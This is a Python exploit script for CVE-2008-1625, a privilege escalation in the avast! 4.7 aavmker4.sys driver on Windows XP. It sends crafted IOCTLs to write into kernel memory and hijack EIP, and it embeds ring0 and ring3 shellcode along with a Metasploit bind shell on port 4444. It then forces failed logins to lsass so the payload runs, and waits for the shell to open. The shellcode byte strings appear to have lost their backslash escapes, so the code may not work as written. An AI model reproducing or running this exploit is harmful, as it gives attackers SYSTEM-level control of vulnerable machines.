#!/usr/bin/python
# avast! 4.7 aavmker4.sys privilege escalation
# http://www.trapkit.de/advisories/TKADV2008-002.txt
# CVE-2008-1625
# Tested on WindXpSp2/Sp3 Dep ON
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 17/04/2010
# Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0
from ctypes import *
import time, struct, sys, thread, os

kernel32 = windll.kernel32
Psapi    = windll.Psapi

def findSysBase(drv):
	print "(+) Retrieving %s base address..." % drv
	ARRAY_SIZE            = 1024
	myarray               = c_ulong * ARRAY_SIZE
	lpImageBase           = myarray()
	cb                    = c_int(1024)
	lpcbNeeded            = c_long()
	drivername_size       = c_long()
	drivername_size.value = 48
	Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
	for baseaddy in lpImageBase:
		drivername = c_char_p("x00"*drivername_size.value)
		if baseaddy:
			Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
							drivername_size.value)
			if drivername.value.lower() == drv:
				print "(+) Address retrieved: %s" % hex(baseaddy)
				return baseaddy
	return None

def checkShell():
	check = "netstat -an | find "4444""
	res = os.popen(check)
	ret = res.read()
	res.close()
	if ret.find("0.0.0.0:4444") != -1:
		return True
	else:
		return False

def kickLsass():
	time.sleep(10)
	lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL"
	lsas2 = "net use \\127.0.0.1 /user:administrator test > NUL"
	nc    = "nc 127.0.0.1 4444"
	print "(!) NO BSOD? good sign :)"
	print "(*) Sleeping 60 secs before the Woshi finger hold..."
	time.sleep(60)
	# Trying to kick ls-ass, any auth good or failed should help
	# if this doesn't work for you try to rdp to the vuln box or
	# logout/login from console... it's rough but should work ;)
	print "(+) Trying to fail an auth to trigger syscall..."
	os.system(lsas1)
	time.sleep(1)
	os.system(lsas2)
	while 1:
		res = checkShell()
		if res:
			print "($) Shell is ready 0.0.0.0:4444"
			#os.system(nc)
			#print "(-) netcat not in path but shell is open!"
			break
		print "(*) Retrying. Sleeping 30 secs..."
		time.sleep(30)
		print "(+) Trying to fail an auth to trigger syscall..."
		os.system(lsas1)
		time.sleep(1)
		os.system(lsas2)
    
def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output,
			out_size, dwReturn1):
	# We trigger func pointer to control EIP
	time.sleep(5)
	print "(+) Owning EIP..."
	for i in range(1,3):
		print "(+) Triggering function pointer: %d/2" % i
		dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input,
							stor_size, stor_output, out_size,
							byref(dwReturn1), None)
		time.sleep(0.5)
	
if __name__ == '__main__':
	print "(*) avast! 4.7 aavmker4.sys privilege escalation"
	print "(+) coded by Matteo Memelli aka ryujin -> at <- offsec.com"
	print "(+) www.offsec.com || Spaghetti & Pwnsauce"
	print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010"
	GENERIC_READ  = 0x80000000
	GENERIC_WRITE = 0x40000000
	OPEN_EXISTING = 0x3
	CREATE_ALWAYS = 0x2
	IOCTL_STOR    = 0xb2d6001c # stores stuff to bypass checks in .data
	IOCTL_VULN    = 0xb2d60030 # writes to arbitrary memory
	IOCTL_EIP     = 0xb2d60020 # triggers function pointer to own EIP 
	# DosDevicesAAVMKER4 DeviceAavmKer4
	DEVICE_NAME   = "\\.\AavmKer4"
	dwReturn1     = c_ulong()
	dwReturn2     = c_ulong()
	evil_size     = 0x878
	out_size      = 0x1024
	stor_size     = 0x418
	evil_output   = ""
	stor_output   = ""
	driver_name   = 'aavmker4.sys'

	# evil_input = 0x878
	# Payload = 496 bytes
	# ring0_migrate = 45 bytes || # xf0x01 bytes to copy
	ring0_migrate = (
	"xfcxfaxebx24x5ex68x76x01x00x00x59x0fx32x89x86x69"
	"x00x00x00x8bxbex6dx00x00x00x89xf8x0fx30xb9xf0x01" 
	"x00x00xf3xa4xfbxf4xebxfdxe8xd7xffxffxff" )
	
	# ring0_msr = 117 bytes
	ring0_msr = (
	"x6ax00x9cx60xe8x00x00x00x00x58x8bx98x60x00x00x00"
	"x89x5cx24x24x81xf9xdexc0xadxdex75x10x68x76x01x00"
	"x00x59x89xd8x31xd2x0fx30x31xc0xebx3ax8bx32x0fxb6"
	"x1ex66x81xfbxc3x00x75x2ex8bx98x68x00x00x00x8dx9b"
	"x75x00x00x00x89x1axb8x01x00x00x80x0fxa2x81xe2x00"
	"x00x10x00x74x11xbax00xffx3fxc0x81xc2x04x00x00x00"
	"x81x22xffxffxffx7fx61x9dxc3xffxffxffxffx00x04xdf"
	"xffx00x04xfex7f" )
	
	# ring3_stager = 61 bytes
	ring3_stager = (
	"x60x6ax30x58x99x64x8bx18x39x53x0cx74x2ex8bx43x10"
	"x8bx40x3cx83xc0x28x8bx08x03x48x03x81xf9x6cx61x73"
	"x73x75x18xe8x0ax00x00x00xe8x10x00x00x00xe9x09x00"
	"x00x00xb9xdexc0xadxdex89xe2x0fx34x61xc3" )
		
	# msf payload: bindshell port 4444 318 bytes
	ring3_shellcode = (
	"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
	"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
	"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
	"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
	"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
	"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
	"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
	"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
	"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
	"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
	"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
	"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
	"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
	"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
	"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
	"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
	"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
	"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
	"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
	"x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0xc3" )

	sysbase       = findSysBase(driver_name)
	if not sysbase:
		print "(-) Couldn't retrieve driver base address, exiting..."
		sys.exit()

	driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 
						0, None, CREATE_ALWAYS, 0, None)
	driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 
						0, None, CREATE_ALWAYS, 0, None)
	
	# .data memory area we write to; offset from base = 0x2e04 
	read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data
	# r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop
	r0_address    = struct.pack('L', sysbase+0x23fa)
	evil_input    = r0_address*2 + "x90"*0x102
	evil_input   += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode
	evil_input   += "x41"*0x549 
	evil_input   += read_data_from + "x42x42x42x42" # bypass input checks
	stor_input    = "x43x43x43x43" # padding
	stor_input   += "x07xADxDExD0" # cmp dword ptr [eax], 0D0DEAD07h
	stor_input   += "xBAxD0xBAx10" # cmp dword ptr [eax+4], 10BAD0BAh
	stor_input   += "x44x44x44x44"*2
	# After arbitrary write to memory nt!KeSetEvent is called: we need to fix
	# nt!KeSetEvent+0x32 using any addy  pointing  to value different to 0x01
	# so we can use our "read_data_from" again.
	stor_input   += read_data_from 
	stor_input   += "x44x44x44x44"
	# 0x2300 offset from base: we write here to control a function pointer
	# and own EIP
	stor_input   += struct.pack('L', sysbase+0x2300) + "x45"*414

	# trigger these later on...
	thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size,
					stor_output, out_size, dwReturn1))
	thread.start_new(kickLsass, ())
	###########################################################################

	# And now let's own the boy:
	if driver_handle1:
		# We store values to overcome input checks
		print "(+) Storing our precious in kernel space ;) ..."
		dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input, 
							stor_size, stor_output, out_size,
							byref(dwReturn1), None)
		# We trigger arbitrary write
		print "(*) Sending evil IOCTL..."
		print "(+) Pwnage in progress...."
		dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN, 
							evil_input, evil_size, evil_output,
							evil_size, 
							byref(dwReturn2), None)